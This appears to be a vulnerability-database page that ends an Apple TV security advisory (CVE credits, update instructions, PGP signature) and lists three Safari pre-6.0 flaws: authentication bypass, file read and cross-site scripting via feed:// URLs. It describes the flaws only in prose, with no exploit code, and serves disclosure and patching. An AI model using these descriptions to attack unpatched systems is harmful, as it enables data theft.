CVE-2011-2834 : Yang Dingning of NCNIPC, Graduate University of
Chinese Academy of Sciences
CVE-2011-3919 : Juri Aedla
Apple TV
Available for: Apple TV 2nd generation and later
Impact: An attacker with a privileged network position may cause an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in
JavaScriptCore. These issues were addressed through improved memory
handling.
CVE-ID
CVE-2012-0682 : Apple Product Security
CVE-2012-0683 : Dave Mandelin of Mozilla
CVE-2012-3589 : Dave Mandelin of Mozilla
CVE-2012-3590 : Apple Product Security
CVE-2012-3591 : Apple Product Security
CVE-2012-3592 : Apple Product Security
CVE-2012-3678 : Apple Product Security
CVE-2012-3679 : Chris Leary of Mozilla
Installation note:
Apple TV will periodically check for software updates. Alternatively,
you may manually check for software updates by selecting
"Settings -> General -> Update Software".
To check the current version of software, select
"Settings -> General -> About".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.17 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJQXO50AAoJEPefwLHPlZEwc40P/AmBKys+PAsdT8gGrSpOY1B9
8h+Y0xdE+Hmesq9D4p6wvdY/lR+zMqtSwT6amNImYCIaRmm1P8+r8n31be52TYlg
7GqEAZbDtFztHwIISC8Khf8dMvWSrLhzRa7X/cxlIgRKmoXFnqJZzYcUov/M9Uw8
KwejQnztmAx7srHnZCNI+dxFqAC7hPoegnDnlVPx1DkwKDjt8q9xD3PGQyiGWWkI
wqUEWvMGWr65CFyA7R0hDqKuNCowWn2cKP1UhIoEur5yRmc4aQVtOnHhJ8k9mdoO
+58JC/y8lCtqGUyEL2Ar0FmIcRX/GJf+/isKOtmHx0JuEhH5beQ6s9FxU5eNR9DH
EVPmVXowY9wMvKxwHFU3jwq8kQ3+IYC+7KA6lScb5mXO5mC5dbJPLp7uJto7+VtI
atgQmvzdB8G562wpwTPuA4UQWWr0i6WWl8zkfgkRHO+cXyN683rkBP/vVEo9FipR
YkQ10RsXqYDRXBcRywmTZZwQy6txMtV9D2bnk1uukQHBsZh30/mEpcmZbo6CO3s3
mnOtu5D2OQsNt4MqbviUkEgdc9JIJnqAOo+9YguDCEu6Rd7unbKB3RpmD+A3OJnR
GhEa2Gqyvm/ozfb2D4L01y4UQo7dMLw+t/FOZXkrpdLlWn2LANWvXDCPSzIFCKoN
cXF+ij425pfY+d7Iekz3
=PSL+
-----END PGP SIGNATURE-----
| VAR-201207-0488 | CVE-2012-0680 | plural Apple Vulnerabilities that can bypass product authentication |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Apple Safari before 6.0 does not properly handle the autocomplete attribute of a password input element, which allows remote attackers to bypass authentication by leveraging an unattended workstation. Apple Safari is prone to a security-bypass vulnerability.
Attackers can exploit this issue to bypass certain security restrictions and gain access to potentially sensitive information.
Versions prior to Safari 6.0 are vulnerable.
Note: This issue was previously discussed in BID 54669 (Apple Safari Prior to 6.0 Multiple Security Vulnerabilities), but has been given its own record to better document it. Apple Apple Safari is a web browser developed by Apple (Apple), and is the default browser included with Mac OS X and iOS operating systems
| VAR-201207-0487 | CVE-2012-0679 | Apple Safari 6.0 Vulnerability to read arbitrary files in less than |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Apple Safari before 6.0 allows remote attackers to read arbitrary files via a feed:// URL. Apple Safari is prone to an information-disclosure vulnerability.
An attacker can exploit this issue to obtain sensitive information that may lead to further attacks.
Note: This issue was previously discussed in BID 54669 (Apple Safari Prior to 6.0 Multiple Security Vulnerabilities), but has been given its own record to better document it. Apple Apple Safari is a web browser developed by Apple (Apple), and is the default browser included with Mac OS X and iOS operating systems
| VAR-201207-0486 | CVE-2012-0678 | Apple Safari 6.0 Cross-site scripting vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in Apple Safari before 6.0 allows remote attackers to inject arbitrary web script or HTML via a feed:// URL.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of another site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
This issue affects Apple Safari versions prior to 6.0.
Note: This issue was previously discussed in BID 54669 (Apple Safari Prior to 6.0 Multiple Security Vulnerabilities), but has been given its own record to better document it. Apple Apple Safari is a web browser developed by Apple (Apple), and is the default browser included with Mac OS X and iOS operating systems